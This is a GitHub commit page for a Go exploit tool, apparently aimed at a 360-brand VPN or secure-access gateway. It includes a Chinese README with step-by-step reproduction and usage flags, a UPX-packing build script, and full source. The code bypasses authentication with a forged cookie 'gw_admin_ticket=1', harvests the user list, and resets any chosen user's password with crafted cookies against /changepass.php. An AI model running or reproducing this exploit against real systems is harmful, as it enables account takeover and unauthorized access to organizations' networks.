-
Notifications
You must be signed in to change notification settings - Fork 81
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit b50323c
Showing
16 changed files
with
316 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
.idea |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
# 1.**复现** | ||
|
||
1.使用cookie editor插件添加cookie值gw\_admin\_ticket为1. | ||
|
||
![](pics/1.png) | ||
|
||
2.使用charset插件修改网页编码为utf-8使页面正常显示 | ||
|
||
![](pics\2.png) | ||
|
||
3.获取到用户名信息. | ||
|
||
![](pics\3.png) | ||
|
||
4.使用hackbar对地址/changepass.php?type=2发送修改密码数据,并将cookie值修改为如下,this_name为你需要修改密码的用户名称. | ||
|
||
![](pics\4.png) | ||
|
||
![](pics\5.png) | ||
|
||
5.返回修改密码成功.可能会提示密码强度不够可以尝试随机生成字符串来生成。 | ||
|
||
![](pics\6.png) | ||
|
||
# 2.工具使用 | ||
|
||
1.下载对应系统版本工具 | ||
|
||
```shell | ||
./VPN_linux_amd64 -h | ||
Usage of /tmp/go-build2269393005/b001/exe/main: | ||
-c check target vuln.(default) (default true) | ||
-e change user's password. | ||
-p string | ||
manual set password you want change.(default is generate by random.) (default "BpLnfgDsc3WD") | ||
-t int | ||
request timeout default is 5 second. (default 5) | ||
-u string | ||
target you want fuck.(example:https://xxxxx:xxx) | ||
``` | ||
2.参数介绍 | ||
| 参数 | 含义 | | ||
| ---- | ----------------------------------------------------- | | ||
| c | 检测模块,默认启用,存在漏洞的话会输出目标的用户列表. | | ||
| e | 修改密码模块,默认不启用. | | ||
| p | 更改后的密码,默认随机生成. | | ||
| t | 请求超时时间,默认为5s. | | ||
| u | 需要检测的目标url地址,. | | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
export LDFLAGS='-s -w ' | ||
|
||
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_linux_amd64 main.go | ||
CGO_ENABLED=0 GOOS=windows GOARCH=386 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_386.exe main.go | ||
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_amd64.exe main.go | ||
CGO_ENABLED=0 GOOS=windows GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_arm64.exe main.go | ||
CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_amd64 main.go | ||
CGO_ENABLED=0 GOOS=darwin GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_arm64 main.go | ||
|
||
upx -9 VPN_linux_amd64 | ||
upx -9 VPN_windows_386.exe | ||
upx -9 VPN_windows_amd64.exe | ||
upx -9 VPN_windows_arm64.exe | ||
upx -9 VPN_darwin_amd64 | ||
upx -9 VPN_darwin_arm64 | ||
|
||
zip VPN_linux_amd64.zip VPN_linux_amd64 config.yaml | ||
zip VPN_windows_386.zip VPN_windows_386.exe config.yaml | ||
zip VPN_windows_amd64.zip VPN_windows_amd64.exe config.yaml | ||
zip VPN_windows_arm64.zip VPN_windows_arm64.exe config.yaml | ||
zip VPN_darwin_amd64.zip VPN_darwin_amd64 config.yaml | ||
zip VPN_darwin_arm64.zip VPN_darwin_arm64 config.yaml | ||
|
||
rm -f VPN_linux_amd64 | ||
rm -f VPN_windows_386.exe | ||
rm -f VPN_windows_amd64.exe | ||
rm -f VPN_windows_arm64.exe | ||
rm -f VPN_darwin_amd64 | ||
rm -f VPN_darwin_arm64 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
module 360ConnectTool | ||
|
||
go 1.20 | ||
|
||
require github.com/go-resty/resty/v2 v2.7.0 | ||
|
||
require ( | ||
github.com/PuerkitoBio/goquery v1.8.1 // indirect | ||
github.com/andybalholm/cascadia v1.3.2 // indirect | ||
golang.org/x/net v0.10.0 // indirect | ||
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
github.com/PuerkitoBio/goquery v1.8.1 h1:uQxhNlArOIdbrH1tr0UXwdVFgDcZDrZVdcpygAcwmWM= | ||
github.com/PuerkitoBio/goquery v1.8.1/go.mod h1:Q8ICL1kNUJ2sXGoAhPGUdYDJvgQgHzJsnnd3H7Ho5jQ= | ||
github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA= | ||
github.com/andybalholm/cascadia v1.3.2 h1:3Xi6Dw5lHF15JtdcmAHD3i1+T8plmv7BQ/nsViSLyss= | ||
github.com/andybalholm/cascadia v1.3.2/go.mod h1:7gtRlve5FxPPgIgX36uWBX58OdBsSS6lUvCFb+h7KvU= | ||
github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= | ||
github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= | ||
github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= | ||
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= | ||
golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= | ||
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= | ||
golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= | ||
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= | ||
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= | ||
golang.org/x/net v0.0.0-20210916014120-12bc252f5db8/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= | ||
golang.org/x/net v0.0.0-20211029224645-99673261e6eb h1:pirldcYWx7rx7kE5r+9WsOXPXK0+WH5+uZ7uPmJ44uM= | ||
golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= | ||
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= | ||
golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= | ||
golang.org/x/net v0.7.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= | ||
golang.org/x/net v0.9.0/go.mod h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= | ||
golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= | ||
golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= | ||
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= | ||
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= | ||
golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= | ||
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= | ||
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= | ||
golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= | ||
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= | ||
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= | ||
golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= | ||
golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= | ||
golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= | ||
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= | ||
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= | ||
golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k= | ||
golang.org/x/term v0.7.0/go.mod h1:P32HKFT3hSsZrRxla30E9HqToFYAQPCMs/zFMBUFqPY= | ||
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= | ||
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= | ||
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= | ||
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= | ||
golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= | ||
golang.org/x/text v0.9.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= | ||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= | ||
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= | ||
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= | ||
golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= | ||
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
package main | ||
|
||
import "360ConnectTool/module" | ||
|
||
func main() { | ||
module.V.Run() | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
package module | ||
|
||
import ( | ||
"flag" | ||
"fmt" | ||
"log" | ||
"net/url" | ||
) | ||
|
||
var ( | ||
V vpnConnect | ||
getUserListPath = "/admin/group/x_group.php?id=1" | ||
changePasswordPath = "/changepass.php?type=2" | ||
password string | ||
) | ||
|
||
func (v *vpnConnect) init() { | ||
flag.StringVar(&v.target, "u", "", "target you want fuck.(example:https://xxxxx:xxx)") | ||
flag.IntVar(&v.timeout, "t", 5, "request timeout default is 5 second.") | ||
flag.BoolVar(&v.check, "c", true, "check target vuln.(default)") | ||
flag.BoolVar(&v.change, "e", false, "change user's password.") | ||
flag.StringVar(&password, "p", v.generatePassword(), "manual set password you want change.(default is generate by random.)") | ||
flag.Parse() | ||
v.isVul = false | ||
if v.target == "" { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln("give me a valid target url") | ||
} else { | ||
u, err := url.Parse(v.target) | ||
if err != nil { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln(err) | ||
} | ||
v.target = fmt.Sprintf("%s://%s", u.Scheme, u.Host) | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
package module | ||
|
||
type vpnConnect struct { | ||
target string | ||
users []string | ||
canGetUser bool | ||
isVul bool | ||
timeout int | ||
check bool | ||
change bool | ||
cookie string | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
package module | ||
|
||
import ( | ||
"fmt" | ||
"math/rand" | ||
"strings" | ||
) | ||
|
||
func (v vpnConnect) generatePassword() string { | ||
charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" | ||
sb := strings.Builder{} | ||
sb.Grow(16) | ||
for i := 0; i < 12; i++ { | ||
sb.WriteByte(charset[rand.Intn(len(charset))]) | ||
} | ||
return sb.String() | ||
} | ||
func (v vpnConnect) showUserList() { | ||
for k, v := range v.users { | ||
fmt.Printf("%d.%s ", k, v) | ||
if k == 0 { | ||
continue | ||
} else if k%8 == 0 { | ||
fmt.Println() | ||
} | ||
} | ||
fmt.Println() | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,89 @@ | ||
package module | ||
|
||
import ( | ||
"crypto/tls" | ||
"fmt" | ||
"github.com/PuerkitoBio/goquery" | ||
"github.com/go-resty/resty/v2" | ||
"log" | ||
"net/http" | ||
"strings" | ||
"time" | ||
) | ||
|
||
func (v *vpnConnect) getUserList() { | ||
headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"} | ||
headers["cookie"] = "gw_admin_ticket=1" | ||
v.users = make([]string, 0) | ||
client := resty.New() | ||
client.SetHeaders(headers) | ||
client.SetBaseURL(v.target) | ||
client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) | ||
client.SetTimeout(time.Duration(v.timeout) * time.Second) | ||
resp, err := client.R().Get(getUserListPath) | ||
if err != nil { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln(err) | ||
} | ||
dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body()))) | ||
if err != nil { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln(err) | ||
} | ||
if !strings.Contains(string(resp.Body()), "用户信息") { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln("target may secure.") | ||
} | ||
log.SetPrefix("[*] ") | ||
log.Println("Try To Get Target's User List.") | ||
dom.Find("#user_unsel > option").Each( | ||
func(i int, selection *goquery.Selection) { | ||
v.users = append(v.users, strings.Split(selection.Text(), "->")[1]) | ||
}) | ||
log.SetPrefix("[*] ") | ||
log.Println("Target User List Got It.") | ||
log.Printf("Target Have %d User.\n", len(v.users)) | ||
v.canGetUser = true | ||
v.cookie = resp.Cookies()[0].Value | ||
} | ||
func (v *vpnConnect) changePassword() { | ||
v.showUserList() | ||
var index int | ||
fmt.Print("[!] Give A Num of User That You Want To Change Password:") | ||
fmt.Scanf("%d\n", &index) | ||
log.SetPrefix("[*] ") | ||
log.Printf("Trying To Change User %s's Password.", v.users[index]) | ||
headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded"} | ||
headers["cookie"] = fmt.Sprintf(`PHPSESSID=%s;gw_user_ticket=ffffffffffffffffffffffffffffffff; user_lang_id=2; last_step_param={"this_name": "%s","subAuthId": "1"}`, v.cookie, v.users[index]) | ||
client := resty.New() | ||
client.SetHeaders(headers) | ||
client.SetBaseURL(v.target) | ||
client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) | ||
client.SetTimeout(time.Duration(v.timeout) * time.Second) | ||
body := fmt.Sprintf(`password=%s&repassword=%s&vcode=&old_pass=`, password, password) | ||
resp, err := client.R().SetBody(body).Post(changePasswordPath) | ||
if err != nil { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln(err) | ||
} | ||
if resp.StatusCode() == http.StatusOK && strings.Contains(string(resp.Body()), "修改密码成功") { | ||
log.SetPrefix("[!] ") | ||
log.Printf("User %s's Password Change To %s", v.users[index], password) | ||
} else { | ||
log.SetPrefix("[!] ") | ||
dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body()))) | ||
if err != nil { | ||
log.SetPrefix("[-] ") | ||
log.Fatalln(err) | ||
} | ||
log.SetPrefix("[!] ") | ||
log.Fatalln(dom.Find(".main_font").Text()) | ||
} | ||
} | ||
func (v *vpnConnect) Run() { | ||
v.init() | ||
v.getUserList() | ||
if v.change { | ||
v.changePassword() | ||
} | ||
} |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.